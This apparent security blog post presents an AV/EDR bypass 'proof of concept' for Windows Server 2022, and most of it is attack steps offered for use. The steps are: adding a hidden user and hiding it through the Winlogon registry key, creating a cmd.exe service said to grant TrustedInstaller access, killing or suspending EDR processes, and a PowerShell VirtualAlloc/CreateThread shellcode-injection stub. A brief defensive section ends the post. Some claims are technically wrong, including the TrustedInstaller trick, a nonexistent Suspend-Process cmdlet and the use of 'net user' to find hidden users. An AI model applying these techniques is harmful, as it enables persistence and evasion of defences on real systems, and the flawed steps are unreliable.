Bypass AV/EDR on Critical Server for Anti-Forensic, Persistence, and Hidden User Access

Listen to this Post

In this article, we explore a Proof of Concept (POC) for bypassing AV/EDR on a critical server, specifically targeting Windows Server 2022. The technique involves anti-forensic measures, persistence mechanisms, and adding a hidden user to gain TrustedInstaller access for loading malicious drivers and disabling EDR/AV. This can be integrated with PE-Loader and in-memory injection for advanced exploitation.

You Should Know:

1. Adding a Hidden User

To create a hidden user on a Windows system, use the following command:
[cmd]
net user hiddenuser Password123 /add /active:yes
[/cmd]
To hide the user from the login screen, modify the registry:

reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v hiddenuser /t REG_DWORD /d 0 /f 

#### **2. Gaining TrustedInstaller Access**

TrustedInstaller is a system account with high privileges. To impersonate it, use the following steps:

1. Open Command Prompt as Administrator.

  1. Use the `sc` command to create a service:
    sc create TrustedInstallerSvc binPath= "C:\Windows\System32\cmd.exe" start= auto 
    

3. Start the service:

sc start TrustedInstallerSvc 

#### **3. Disabling EDR/AV**

To kill EDR/AV processes, identify the process name and terminate it:

taskkill /f /im edr_process.exe 

For a more stealthy approach, use PowerShell to suspend the process:

Suspend-Process -Name edr_process 

#### **4. PE-Loader and In-Memory Injection**

For in-memory injection, use tools like PowerShell Empire or Cobalt Strike. Here’s a basic example using PowerShell:

$code = '[DllImport("kernel32.dll")]public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);[DllImport("kernel32.dll")]public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);' 
$winFunc = Add-Type -memberDefinition $code -Name "Win32" -namespace Win32Functions -passthru 
[Byte[]] $shellcode = 0x90,0x90,0x90... 
$size = $shellcode.Length 
[IntPtr]$addr = $winFunc::VirtualAlloc(0,$size,0x3000,0x40) 
[System.Runtime.InteropServices.Marshal]::Copy($shellcode, 0, $addr, $size) 
$winFunc::CreateThread(0,0,$addr,0,0,0) 

### **What Undercode Say:**

This POC demonstrates the potential risks of AV/EDR bypass techniques on critical servers. System administrators must ensure proper hardening of servers, including regular patching, monitoring for hidden users, and restricting high-privilege access. For defenders, understanding these techniques is crucial for developing robust detection and response mechanisms.

**Relevant Commands for Defense:**

  • Monitor hidden users:
    net user 
    
  • Check for suspicious services:
    sc query 
    
  • Audit process activity:
    Get-Process | Where-Object { $_.ProcessName -eq "edr_process" } 
    

For further reading, refer to:

Stay vigilant and keep your systems secure!

References:

Reported By: Hassan Sohrabian – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

Join Our Cyber World:

💬 Whatsapp | 💬 TelegramFeatured Image